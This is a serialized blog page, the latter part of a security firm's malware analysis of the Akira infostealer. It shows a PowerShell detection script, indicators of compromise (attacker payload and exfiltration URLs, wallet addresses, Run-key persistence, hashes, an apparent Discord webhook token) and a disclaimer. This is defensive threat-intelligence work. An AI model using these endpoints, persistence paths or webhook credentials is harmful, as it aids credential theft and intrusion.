break\n",[102,15722,15723],{"class":104,"line":9885},[102,15724,15725],{}," }\n",[102,15727,15728],{"class":104,"line":9890},[102,15729,15730],{}," }\n",[102,15732,15733],{"class":104,"line":9895},[102,15734,15735],{}," if (-not $hit) { return }\n",[102,15737,15738],{"class":104,"line":9901},[102,15739,7846],{"emptyLinePlaceholder":2180},[102,15741,15742],{"class":104,"line":9907},[102,15743,15744],{}," # 2.4 Build relative path\n",[102,15746,15747],{"class":104,"line":9913},[102,15748,15749],{}," $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[102,15751,15752],{"class":104,"line":9919},[102,15753,7846],{"emptyLinePlaceholder":2180},[102,15755,15756],{"class":104,"line":9924},[102,15757,15758],{}," # 2.5 Collect\n",[102,15760,15761],{"class":104,"line":9929},[102,15762,15763],{}," $matches.Add([PSCustomObject]@{\n",[102,15765,15766],{"class":104,"line":9935},[102,15767,15768],{}," FileName = $_.Name\n",[102,15770,15771],{"class":104,"line":9941},[102,15772,15773],{}," Location = $rel\n",[102,15775,15776],{"class":104,"line":9947},[102,15777,15778],{}," 'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[102,15780,15781],{"class":104,"line":9953},[102,15782,15783],{}," Keyword = $hit\n",[102,15785,15786],{"class":104,"line":9958},[102,15787,15788],{}," })\n",[102,15790,15791],{"class":104,"line":9963},[102,15792,15793],{}," }\n",[102,15795,15796],{"class":104,"line":9969},[102,15797,6410],{},[102,15799,15800],{"class":104,"line":9974},[102,15801,7846],{"emptyLinePlaceholder":2180},[102,15803,15804],{"class":104,"line":9979},[102,15805,15572],{},[102,15807,15808],{"class":104,"line":9985},[102,15809,15810],{},"# 3. Display Results\n",[102,15812,15813],{"class":104,"line":9991},[102,15814,15572],{},[102,15816,15817],{"class":104,"line":9997},[102,15818,15819],{},"clear\n",[102,15821,15822],{"class":104,"line":10002},[102,15823,15824],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[102,15826,15827],{"class":104,"line":10008},[102,15828,15829],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[102,15831,15832],{"class":104,"line":10014},[102,15833,7846],{"emptyLinePlaceholder":2180},[102,15835,15836],{"class":104,"line":10019},[102,15837,15838],{},"if ($matches.Count -gt 0) {\n",[102,15840,15841],{"class":104,"line":10025},[102,15842,15843],{}," $matches |\n",[102,15845,15846],{"class":104,"line":10031},[102,15847,15848],{}," Sort-Object Location, FileName |\n",[102,15850,15851],{"class":104,"line":10036},[102,15852,15853],{}," Format-Table -AutoSize `\n",[102,15855,15856],{"class":104,"line":10041},[102,15857,15858],{}," @{Label='File'; Expression={$_.FileName}},\n",[102,15860,15861],{"class":104,"line":10046},[102,15862,15863],{}," @{Label='Location'; Expression={$_.Location}},\n",[102,15865,15866],{"class":104,"line":10052},[102,15867,15868],{}," @{Label='Size (KB)'; Expression={$_. 'Size (KB)'}},\n",[102,15870,15872],{"class":104,"line":15871},79,[102,15873,15874],{}," @{Label='Keyword'; Expression={$_.Keyword}}\n",[102,15876,15878],{"class":104,"line":15877},80,[102,15879,7846],{"emptyLinePlaceholder":2180},[102,15881,15883],{"class":104,"line":15882},81,[102,15884,15885],{}," Write-Host \"`n⚠️ Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[102,15887,15889],{"class":104,"line":15888},82,[102,15890,6410],{},[102,15892,15894],{"class":104,"line":15893},83,[102,15895,15896],{},"else {\n",[102,15898,15900],{"class":104,"line":15899},84,[102,15901,15902],{}," Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[102,15904,15906],{"class":104,"line":15905},85,[102,15907,6410],{},[102,15909,15911],{"class":104,"line":15910},86,[102,15912,7846],{"emptyLinePlaceholder":2180},[102,15914,15916],{"class":104,"line":15915},87,[102,15917,15918],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[102,15920,15922],{"class":104,"line":15921},88,[102,15923,15924],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[52,15926],{"className":15927},[4854,4855],[25,15929,15931],{"id":15930},"_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","12. Beyond Response – How glueckkanja CSOC Turns Incidents into Insights",[12,15933,31],{},[12,15935,15936,15937],{},"Most security operations centers stop at containment.\n",[251,15938,15939],{},"We don’t.",[12,15941,15942],{},"At glueckkanja CSOC, we believe incident response isn’t the finish line—it’s the starting point.",[12,15944,15945],{},"When others declare victory and move on, we dive deeper. For us, each incident is an opportunity to learn, adapt, and become stronger. Our relentless curiosity, fueled by years of deep forensic expertise and reverse engineering capability, ensures we don’t just defend—we anticipate.",[12,15947,15948,15949,1014],{},"This philosophy is why we built the ",[251,15950,15951],{},"Akira Compromise Reporter",[12,15953,15954],{},"Far beyond basic detection, this internally developed forensic tool uses our intimate knowledge of the Akira Stealer to provide absolute clarity on what data has been compromised. Within minutes, it produces a precise, actionable snapshot of the incident's full impact:",[1255,15956,15957,15960,15963],{},[1258,15958,15959],{},"Exactly which credentials, tokens, and browser sessions were stolen.",[1258,15961,15962],{},"Precisely which cryptocurrency wallets, messaging accounts, and files were exposed.",[1258,15964,15965],{},"A clear, structured, and detailed forensic report—transforming uncertainty into immediate, informed action.",[12,15967,15968],{},[2772,15969],{"alt":15970,"src":15971},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[12,15973,15974],{},"Because at glueckkanja, we measure our success not just by threats blocked, but by clarity provided. ybersecurity, done right, isn’t about simply reacting to incidents—It’s about understanding, adapting, and always staying one step ahead.",[12,15976,15977],{},[251,15978,15979],{},"That’s the glueckkanja CSOC difference.",[25,15981,15983],{"id":15982},"_13-indicators-of-compromise-iocs","13. Indicators of Compromise (IOCs)",[12,15985,31],{},[12,15987,15988],{},"Below is a comprehensive, verbatim collection of IOCs extracted directly from the malware code during our internal reverse engineering process at glueckkanja CSOC. No assumptions or external threat intel sources were used — all indicators are confirmed findings. All URLs are deliberately obfuscated to prevent accidental clicks.",[12,15990,15991],{},[251,15992,15993],{},"Abbreviations:",[1255,15995,15996,16002],{},[1258,15997,15998,16001],{},[251,15999,16000],{},"TG:"," Telegram reporting channel",[1258,16003,16004,16007],{},[251,16005,16006],{},"Alt:"," Alternate (fallback) endpoint",[41,16009,16011],{"id":16010},"_1-domains-urls","1. Domains & URLs",[12,16013,47],{},[417,16015,420,16017],{"className":16016,"style":8673},[15091],[438,16018,16019,420,16031,420,16044,420,16057,420,16070,420,16083,420,16096,420,16109,420,16125,420,16141,420,16154,420,16167,420,16180,420,16193,420,16206,420,16219,420,16232,420,16245,420,16258,420,16271,420,16285,420,16298],{},[426,16020,424,16021,424,16025,424,16029,420],{},[430,16022,16024],{"style":16023},"text-align: left; width: 18%;","Category",[430,16026,16028],{"style":16027},"text-align: left; width: 52%;","Obfuscated URL",[430,16030,8848],{"style":8841},[426,16032,424,16033,424,16036,424,16041,420],{},[443,16034,16035],{},"Primary Injection",[443,16037,16038],{},[63,16039,16040],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[443,16042,16043],{},"Initial attacker webhook endpoint",[426,16045,424,16046,424,16049,424,16054,420],{"style":8697},[443,16047,16048],{},"Fallback Injection",[443,16050,16051],{},[63,16052,16053],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[443,16055,16056],{},"Alternate injector endpoint",[426,16058,424,16059,424,16062,424,16067,420],{},[443,16060,16061],{},"Error Reporting (TG)",[443,16063,16064],{},[63,16065,16066],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[443,16068,16069],{},"Telegram error/log reporting URL",[426,16071,424,16072,424,16075,424,16080,420],{"style":8697},[443,16073,16074],{},"Error Reporting (Alt)",[443,16076,16077],{},[63,16078,16079],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[443,16081,16082],{},"Alternate error/log reporting URL",[426,16084,424,16085,424,16088,424,16093,420],{},[443,16086,16087],{},"Vanity Bot (TG)",[443,16089,16090],{},[63,16091,16092],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[443,16094,16095],{},"Vanity address notification endpoint",[426,16097,424,16098,424,16101,424,16106,420],{"style":8697},[443,16099,16100],{},"Vanity Bot (Alt)",[443,16102,16103],{},[63,16104,16105],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[443,16107,16108],{},"Alternate vanity notification endpoint",[426,16110,424,16111,424,16114,424,16119,420],{},[443,16112,16113],{},"Exodus Injection",[443,16115,16116],{},[63,16117,16118],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[443,16120,16121,16122,16124],{},"Electron ",[63,16123,8579],{}," app module",[426,16126,424,16127,424,16130,424,16135,420],{"style":8697},[443,16128,16129],{},"Atomic Injection",[443,16131,16132],{},[63,16133,16134],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[443,16136,16121,16137,16140],{},[63,16138,16139],{},"AtomicWallet"," module",[426,16142,424,16143,424,16146,424,16151,420],{},[443,16144,16145],{},"Updater Download",[443,16147,16148],{},[63,16149,16150],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[443,16152,16153],{},"Persistence dropper executable",[426,16155,424,16156,424,16159,424,16164,420],{"style":8697},[443,16157,16158],{},"Gofile API List",[443,16160,16161],{},[63,16162,16163],{},"https[:]//api.gofile[.]io/servers",[443,16165,16166],{},"Retrieves best GoFile upload server",[426,16168,424,16169,424,16172,424,16177,420],{},[443,16170,16171],{},"Discord Token Check",[443,16173,16174],{},[63,16175,16176],{},"https[:]//discordapp[.]com/api/v9/users/@me",[443,16178,16179],{},"Validates stolen Discord token",[426,16181,424,16182,424,16185,424,16190,420],{"style":8697},[443,16183,16184],{},"Discord Billing Info",[443,16186,16187],{},[63,16188,16189],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[443,16191,16192],{},"Retrieves billing methods",[426,16194,424,16195,424,16198,424,16203,420],{},[443,16196,16197],{},"Google OAuth Replay",[443,16199,16200],{},[63,16201,16202],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[443,16204,16205],{},"Replays stolen Google session tokens",[426,16207,424,16208,424,16211,424,16216,420],{"style":8697},[443,16209,16210],{},"IP Check (hosting)",[443,16212,16213],{},[63,16214,16215],{},"http[:]//ip-api[.]com/line/?fields=hosting",[443,16217,16218],{},"Hosting environment detection",[426,16220,424,16221,424,16224,424,16229,420],{},[443,16222,16223],{},"IP Lookup (geo)",[443,16225,16226],{},[63,16227,16228],{},"http[:]//ip-api[.]com/json/{ip}",[443,16230,16231],{},"Geolocation by IP",[426,16233,424,16234,424,16237,424,16242,420],{"style":8697},[443,16235,16236],{},"Public IP Retrieval",[443,16238,16239],{},[63,16240,16241],{},"https[:]//api[.]ipify[.]org",[443,16243,16244],{},"Fetches external IP address",[426,16246,424,16247,424,16250,424,16255,420],{},[443,16248,16249],{},"File.io Upload",[443,16251,16252],{},[63,16253,16254],{},"https[:]//file[.]io/",[443,16256,16257],{},"Secondary exfiltration channel",[426,16259,424,16260,424,16263,424,16268,420],{"style":8697},[443,16261,16262],{},"Oshi.at Upload",[443,16264,16265],{},[63,16266,16267],{},"http[:]//oshi[.]at/",[443,16269,16270],{},"Tertiary exfiltration channel",[426,16272,424,16273,424,16276,424,16282,420],{},[443,16274,16275],{},"JS Dropper Primary",[443,16277,16278],{},[2630,16279,16281],{"href":16280,"target":2633},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[443,16283,16284],{},"Remote reference to actual ZIP URL",[426,16286,424,16287,424,16290,424,16295,420],{"style":8697},[443,16288,16289],{},"JS Dropper Fallback 1",[443,16291,16292],{},[2630,16293,16294],{"href":7594,"target":2633},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[443,16296,16297],{},"Alternative payload ZIP",[426,16299,424,16300,424,16303,424,16308,420],{},[443,16301,16302],{},"JS Dropper Fallback 2",[443,16304,16305],{},[2630,16306,16307],{"href":7599,"target":2633},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[443,16309,16310],{},"Secondary fallback payload ZIP",[52,16312],{"className":16313},[4854,4855],[41,16315,16317],{"id":16316},"_2-cryptocurrency-addresses","2. Cryptocurrency Addresses",[12,16319,47],{},[417,16321,420,16323],{"className":16322,"style":8673},[15091],[438,16324,16325,420,16333,420,16343,420,16353,420,16363,420,16372,420,16382,420,16392,420,16402,420,16412,420,16422],{},[426,16326,424,16327,424,16330,420],{},[430,16328,16329],{"style":15102},"Currency",[430,16331,16332],{"style":8841},"Address",[426,16334,424,16335,424,16338,420],{},[443,16336,16337],{},"BTC",[443,16339,16340],{},[63,16341,16342],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[426,16344,424,16345,424,16348,420],{"style":8697},[443,16346,16347],{},"ETH",[443,16349,16350],{},[63,16351,16352],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[426,16354,424,16355,424,16358,420],{},[443,16356,16357],{},"DOGE",[443,16359,16360],{},[63,16361,16362],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[426,16364,424,16365,424,16368,420],{"style":8697},[443,16366,16367],{},"LTC",[443,16369,16370],{},[63,16371,15132],{},[426,16373,424,16374,424,16377,420],{},[443,16375,16376],{},"XMR",[443,16378,16379],{},[63,16380,16381],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[426,16383,424,16384,424,16387,420],{"style":8697},[443,16385,16386],{},"BCH",[443,16388,16389],{},[63,16390,16391],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[426,16393,424,16394,424,16397,420],{},[443,16395,16396],{},"DASH",[443,16398,16399],{},[63,16400,16401],{},"XpeiSH1MfQYeehTfxosYHyTHzbgu2LNsG1",[426,16403,424,16404,424,16407,420],{"style":8697},[443,16405,16406],{},"TRX",[443,16408,16409],{},[63,16410,16411],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[426,16413,424,16414,424,16417,420],{},[443,16415,16416],{},"XRP",[443,16418,16419],{},[63,16420,16421],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[426,16423,424,16424,424,16427,420],{"style":8697},[443,16425,16426],{},"XLM",[443,16428,16429],{},[63,16430,16431],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[52,16433],{"className":16434},[4854,4855],[41,16436,16438],{"id":16437},"_3-registry-keys-paths","3. Registry Keys / Paths",[12,16440,47],{},[417,16442,420,16444],{"className":16443,"style":8673},[15091],[438,16445,16446,420,16453,420,16463,420,16473,420,16486],{},[426,16447,424,16448,424,16451,420],{},[430,16449,5662],{"style":16450},"text-align: left; width: 60%;",[430,16452,5204],{"style":8841},[426,16454,424,16455,424,16460,420],{},[443,16456,16457],{},[63,16458,16459],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[443,16461,16462],{},"Checks for virtual GPU driver signature",[426,16464,424,16465,424,16470,420],{"style":8697},[443,16466,16467],{},[63,16468,16469],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[443,16471,16472],{},"Checks for virtual GPU provider name",[426,16474,424,16475,424,16483,420],{},[443,16476,16477,16480,16481,1289],{},[63,16478,16479],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (value ",[251,16482,5673],{},[443,16484,16485],{},"Persistence via Run key (Updater.exe)",[426,16487,424,16488,424,16492,420],{"style":8697},[443,16489,16490],{},[63,16491,5681],{},[443,16493,16494],{},"Persistence Executable",[52,16496],{"className":16497},[4854,4855],[41,16499,16501],{"id":16500},"_5-files-hashes","5. Files & Hashes",[12,16503,47],{},[417,16505,420,16507],{"className":16506,"style":8673},[15091],[438,16508,16509,420,16520,420,16532,420,16544,420,16557,420,16569,420,16581,420,16593,420,16605,420,16618,420,16630,420,16643,420,16655],{},[426,16510,424,16511,424,16513,424,16517,420],{},[430,16512,15435],{"style":16023},[430,16514,16516],{"style":16515},"text-align: left; width: 62%;","SHA256",[430,16518,16519],{"style":8841},"Size (bytes)",[426,16521,424,16522,424,16524,424,16529,420],{},[443,16523,5831],{},[443,16525,16526],{},[63,16527,16528],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[443,16530,16531],{},"63936274",[426,16533,424,16534,424,16536,424,16541,420],{"style":8697},[443,16535,4618],{},[443,16537,16538],{},[63,16539,16540],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[443,16542,16543],{},"162036224",[426,16545,424,16546,424,16549,424,16554,420],{},[443,16547,16548],{},"jscrypter.js",[443,16550,16551],{},[63,16552,16553],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[443,16555,16556],{},"1429",[426,16558,424,16559,424,16561,424,16566,420],{"style":8697},[443,16560,6816],{},[443,16562,16563],{},[63,16564,16565],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[443,16567,16568],{},"30138",[426,16570,424,16571,424,16573,424,16578,420],{},[443,16572,6813],{},[443,16574,16575],{},[63,16576,16577],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[443,16579,16580],{},"7155",[426,16582,424,16583,424,16585,424,16590,420],{"style":8697},[443,16584,6746],{},[443,16586,16587],{},[63,16588,16589],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[443,16591,16592],{},"211",[426,16594,424,16595,424,16597,424,16602,420],{},[443,16596,4622],{},[443,16598,16599],{},[63,16600,16601],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[443,16603,16604],{},"205210",[426,16606,424,16607,424,16610,424,16615,420],{"style":8697},[443,16608,16609],{},"exodus.asar",[443,16611,16612],{},[63,16613,16614],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[443,16616,16617],{},"132486332",[426,16619,424,16620,424,16622,424,16627,420],{},[443,16621,5890],{},[443,16623,16624],{},[63,16625,16626],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[443,16628,16629],{},"28454",[426,16631,424,16632,424,16635,424,16640,420],{"style":8697},[443,16633,16634],{},"download.dat",[443,16636,16637],{},[63,16638,16639],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[443,16641,16642],{},"21142",[426,16644,424,16645,424,16647,424,16652,420],{},[443,16646,6874],{},[443,16648,16649],{},[63,16650,16651],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[443,16653,16654],{},"32375391",[426,16656,424,16657,424,16659,424,16664,420],{"style":8697},[443,16658,4614],{},[443,16660,16661],{},[63,16662,16663],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[443,16665,16666],{},"37652937",[52,16668],{"className":16669},[4854,4855],[41,16671,16673],{"id":16672},"_5-discord-telegram-identifier","5. Discord & Telegram Identifier",[12,16675,47],{},[417,16677,420,16679],{"className":16678,"style":8673},[15091],[438,16680,16681,420,16687,420,16697,420,16707],{},[426,16682,424,16683,424,16685,420],{},[430,16684,16024],{"style":10293},[430,16686,5421],{"style":8841},[426,16688,424,16689,424,16692,420],{},[443,16690,16691],{},"Discord Webhook ID",[443,16693,16694],{},[63,16695,16696],{},"1226766972675428372",[426,16698,424,16699,424,16702,420],{"style":8697},[443,16700,16701],{},"Discord Webhook Token",[443,16703,16704],{},[63,16705,16706],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[426,16708,424,16709,424,16712,420],{},[443,16710,16711],{},"Telegram ID",[443,16713,16714],{},[63,16715,16716],{},"5035121855",[52,16718],{"className":16719},[4854,4855],[25,16721,16723],{"id":16722},"_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","14. Reflecting on the Akira Stealer Incident: Strengthening Your Defense with glueckkanja CSOC",[12,16725,31],{},[12,16727,16728],{},"Throughout this blog, we've explored the sophisticated nature of the Akira Infostealer—an advanced cyber threat characterized by targeted credential theft, stealthy data exfiltration, and persistent methods to evade traditional defenses. Understanding how this malware functions, the risks it poses, and the vulnerabilities it exploits is crucial in building a robust cybersecurity strategy.",[12,16730,16731],{},"The Akira Infostealer specifically targets sensitive data such as login credentials, browser sessions, cryptocurrency wallets, messaging services, and personal or organizational files. Its calculated and precise methods demand more than just standard security measures—they require continuous monitoring, in-depth forensic analysis, and proactive threat intelligence.",[12,16733,16734],{},"At glueckkanja CSOC, we leverage our deep technical expertise and advanced analytical capabilities to go beyond simple detection. Our specialized team continually monitors threats in real-time from our dedicated CSOC servers, enabling immediate identification, thorough investigation, and effective neutralization of threats like the Akira Infostealer.",[12,16736,16737],{},"But our work doesn’t stop at incident response. Every detected incident enriches our knowledge base, enhancing our security posture and ensuring we remain several steps ahead of future threats. With glueckkanja CSOC, you gain more than protection—you gain an adaptive security partner committed to your long-term resilience.",[12,16739,16740],{},"Take the next step in securing your organization's digital assets.",[12,16742,16743],{},"Contact glueckkanja's cybersecurity experts today, and let’s proactively secure your future together.",[12,16745,16746],{},[251,16747,16748],{},"Empower your defense with glueckkanja CSOC.",[25,16750,16752],{"id":16751},"_15-security-legal-disclaimer-use-of-real-malware-code","15. Security & Legal Disclaimer – Use of Real Malware Code",[12,16754,31],{},[12,16756,16757],{},"This publication contains detailed technical insights, including code excerpts and behavioral breakdowns derived from actual malicious software discovered during incident response and forensic investigations. The purpose of sharing this information is strictly educational, intended to help professional defenders understand, detect, and respond to real-world threats more effectively. We publish this in good faith and with the intent to contribute to the broader security community.",[12,16759,16760],{},"It is important to note that portions of the included code originate from threat actor toolkits and malware samples circulating in the wild. These fragments are not our intellectual property, nor are they to be considered safe, sanitized, or otherwise \"harmless.\" The reproduction or operational use of any such code is explicitly discouraged. Readers must understand that while this material serves a research and awareness function, it inherently carries a risk profile that should not be underestimated.",[12,16762,16763],{},"Only trained professionals operating within legally authorized environments—such as accredited security teams, SOC units, academic researchers, or malware labs—should engage with the techniques or code described. All experimentation must be confined to isolated, non-production systems, and comply with applicable laws, internal policies, and ethical standards.",[12,16765,16766],{},"We do not provide support or validation for any reproduced code or behavior. There is no guarantee of accuracy, relevance, or completeness. Furthermore, we explicitly reject any use of this content for offensive purposes, unauthorized red teaming, commercial malware development, or adversarial testing outside a legally defined scope. Any misuse may lead to legal consequences. glueckkanja AG disclaims all responsibility for direct or indirect damages arising from the use or misinterpretation of this content.",[12,16768,16769],{},"By continuing to read or reference this content, you acknowledge the above and agree not to misuse, replicate, or apply any part of it in unlawful or unethical contexts. When in doubt, consult your legal, compliance, or data protection office before engaging with live code analysis or similar technical material.",[12,16771,16772],{},"This publication is provided \"as is,\" without warranty, support, or liability.",[2126,16774,16775],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":65,"searchDepth":111,"depth":111,"links":16777},[16778,16779,16780,16781,16792,16793,16794,16795,16796,16797,16798,16799,16801,16802,16803,16804,16805,16806,16807,16808,16809,16812,16820,16821,16822,16828,16846,16864,16865,16866,16867,16875,16882,16889,16898,16905,16906,16907,16908,16909,16910,16911,16912,16913,16914,16915,16916,16917,16918,16919,16920],{"id":4745,"depth":111,"text":4746},{"id":4793,"depth":111,"text":4794},{"id":4813,"depth":111,"text":4814},{"id":4867,"depth":111,"text":4868,"children":16782},[16783,16784,16786,16788,16790],{"id":4887,"depth":329,"text":4888},{"id":4939,"depth":329,"text":16785},"2.1.2 Updater.exe – Initial Loader",{"id":5044,"depth":329,"text":16787},"2.1.3 main.exe – Obfuscated NodeJS Payload Container",{"id":5162,"depth":329,"text":16789},"2.1.4 cmd.exe & PowerShell Relay",{"id":5272,"depth":329,"text":16791},"2.1.5 python.exe with astor.py",{"id":5406,"depth":111,"text":5407},{"id":5489,"depth":111,"text":5490},{"id":5567,"depth":111,"text":5568},{"id":5646,"depth":111,"text":5647},{"id":5713,"depth":111,"text":5714},{"id":5793,"depth":111,"text":5794},{"id":5902,"depth":111,"text":5903},{"id":6019,"depth":111,"text":16800},"4.2 AMSI Bypass Technique (Class: gofor4msi)",{"id":6204,"depth":111,"text":6205},{"id":6325,"depth":111,"text":6326},{"id":6423,"depth":111,"text":6424},{"id":6519,"depth":111,"text":6520},{"id":6594,"depth":111,"text":6595},{"id":6665,"depth":111,"text":6666},{"id":6725,"depth":111,"text":6726},{"id":6860,"depth":111,"text":6861},{"id":6921,"depth":111,"text":6922,"children":16810},[16811],{"id":6933,"depth":329,"text":6934},{"id":7282,"depth":111,"text":7283,"children":16813},[16814,16815,16816,16817,16818,16819],{"id":7291,"depth":329,"text":7292},{"id":7405,"depth":329,"text":7406},{"id":7602,"depth":329,"text":7603},{"id":7891,"depth":329,"text":7892},{"id":7967,"depth":329,"text":7968},{"id":8127,"depth":329,"text":8128},{"id":8362,"depth":111,"text":8363},{"id":8408,"depth":111,"text":8409},{"id":8420,"depth":111,"text":8421,"children":16823},[16824,16825,16826,16827],{"id":8426,"depth":329,"text":8427},{"id":8470,"depth":329,"text":8471},{"id":8532,"depth":329,"text":8533},{"id":8567,"depth":329,"text":8568},{"id":8603,"depth":111,"text":16829,"children":16830},"7.3 Anti-Analysis / Evasion (Class: VmProtect)",[16831,16832,16833,16834,16836,16837,16838,16839,16840,16841,16842,16843,16844,16845],{"id":8612,"depth":329,"text":8613},{"id":8627,"depth":329,"text":8628},{"id":8667,"depth":329,"text":8668},{"id":8756,"depth":329,"text":16835},"7.3.4 VmProtect Architecture",{"id":9109,"depth":329,"text":9110},{"id":9175,"depth":329,"text":9176},{"id":9244,"depth":329,"text":9245},{"id":9308,"depth":329,"text":9309},{"id":9376,"depth":329,"text":9377},{"id":9433,"depth":329,"text":9434},{"id":9531,"depth":329,"text":9532},{"id":9601,"depth":329,"text":9602},{"id":10057,"depth":329,"text":10058},{"id":10104,"depth":329,"text":10105},{"id":10118,"depth":111,"text":10119,"children":16847},[16848,16849,16851,16853,16855,16857,16859,16861,16863],{"id":10277,"depth":329,"text":10278},{"id":10385,"depth":329,"text":16850},"7.4.2 Password Dumper (Chromium.GetPasswords)",{"id":10507,"depth":329,"text":16852},"7.4.3 Credit Card Dumper (Chromium.GetCreditCards)",{"id":10589,"depth":329,"text":16854},"7.4.4 Cookie Dumper (Chromium.GetCookies)",{"id":10669,"depth":329,"text":16856},"7.4.5 Google Session Dumper (Chromium.dump_google_sessions)",{"id":10796,"depth":329,"text":16858},"7.4.6 History Dumper (Chromium.GetHistory)",{"id":10866,"depth":329,"text":16860},"7.4.7 Autofill Dumper (Chromium.GetAutofills)",{"id":10929,"depth":329,"text":16862},"7.4.8 Firefox Profile Grabber (GeckoDriver & 